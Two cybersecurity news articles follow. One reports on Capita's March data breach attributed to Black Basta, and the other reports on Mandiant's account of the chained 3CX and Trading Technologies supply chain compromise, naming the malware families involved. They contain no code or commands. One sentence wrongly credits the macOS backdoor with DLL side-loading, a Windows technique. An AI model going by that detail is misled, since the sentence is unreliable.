Capita Admits Data Theft in Recent Cyberattack by Hackers - 1

Capita Admits Data Theft in Recent Cyberattack by Hackers

  • Written by Ari Denial Cybersecurity & Tech Writer

UK outsourcing company Capita has disclosed that customer data may have been stolen during a cyberattack in March.

The firm, which provides services to the NHS and the UK government, confirmed that its investigation had found indications of “limited data exfiltration”, possibly affecting customers, suppliers or staff. No further information was released on the nature of the data taken or how many people may have been impacted.

Capita has not provided details about the types of data stolen or the number of customers affected. However, reports suggest that the Black Basta ransomware group, which claimed responsibility for the attack, published personal data such as bank account details and passport photos, as well as data belonging to teachers applying for jobs at schools.

The Black Basta ransomware group, believed to have targeted UK outsourcing firm Capita in a cyber attack last month, is also said to have targeted US satellite television provider Dish. Capita initially reported an “IT issue” before later admitting a “cyber incident” had caused disruption.

Although the company said it had no evidence of data theft, limited data exfiltration was later confirmed. The attack also affected some services provided to clients including Barnet Council and O2. As yet, Capita is not featured on Black Basta’s dark web leak site.

UK government services faced minimal disruption during a cyber attack that affected outsourcing company Capita last month, according to Conor Walsh, a spokesperson for the Cabinet Office. The company holds public sector contracts worth £6.5bn ($8bn). Capita, which has said that it has now restored most of the affected client services, revealed that the hackers first infiltrated its internal systems on 22 March. The breach was interrupted on 31 March. The company has also reinstated staff access to Microsoft 365.

Capita has also revealed that around 4% of its server estate may have been affected by a cyber attack that occurred in March. The company added that it is continuing forensic investigations and will notify affected customers, suppliers or staff in a timely manner. The Information Commissioner’s Office confirmed that it is assessing information provided by Capita.

News Heading - 2

Supply Chain Attack Blamed for Triggering 3CX Breach, Thousands of User Accounts Compromised

  • Written by Ari Denial Cybersecurity & Tech Writer

According to cybersecurity company Mandiant, the recent 3CX supply chain attack, which involved the abuse of popular voice-over-internet-protocol (VOIP) software, was triggered by an earlier supply chain attack against Trading Technologies’ futures trading software.

The researchers suspect that the attackers distributed malware through Trading Technologies’ software to pave the way for the 3CX attack. The initial attack allowed the perpetrators to spread a malicious payload through 3CX and compromise thousands of user accounts.

Mandiant assisted 3CX in its investigation of the recent supply chain attack, has revealed that the malicious installer for Trading Technologies’ X_TRADER software was responsible for deploying a multi-stage modular backdoor named VEILEDSIGNAL.

The backdoor was designed to execute shellcode, inject a communication module into web browsers like Chrome, Firefox, or Edge, and terminate itself. Mandiant discovered that the attackers, tracked as UNC4736, stole corporate credentials from an employee’s personal computer and used them to move laterally through 3CX’s network, eventually breaching both the Windows and macOS build environments.

The attackers then deployed the TAXHAUL launcher and COLDCAT downloader on the Windows build environment, which persisted through DLL hijacking for the IKEEXT service and ran with LocalSystem privileges.

The cybersecurity firm has revealed that the macOS build server was compromised with the POOLRAT backdoor, which used LaunchDaemons as a persistence mechanism, and achieved persistence through DLL side-loading. The malware granted attackers remote access to all compromised devices over the internet. Mandiant has also associated UNC4736 with two clusters of APT43 suspected malicious activity, UNC3782 and UNC4469.

3CX Phone System, which has over 12 million daily users and is used by more than 600,000 businesses globally, including high-profile organizations such as McDonald’s, Coca-Cola, and American Express was compromised in a supply chain attack, according to Mandiant.

The cybersecurity firm said this was the first software supply chain compromise to have led to another software supply chain compromise, demonstrating the potential reach of this type of attack, especially when a threat actor can chain intrusions as demonstrated in this investigation.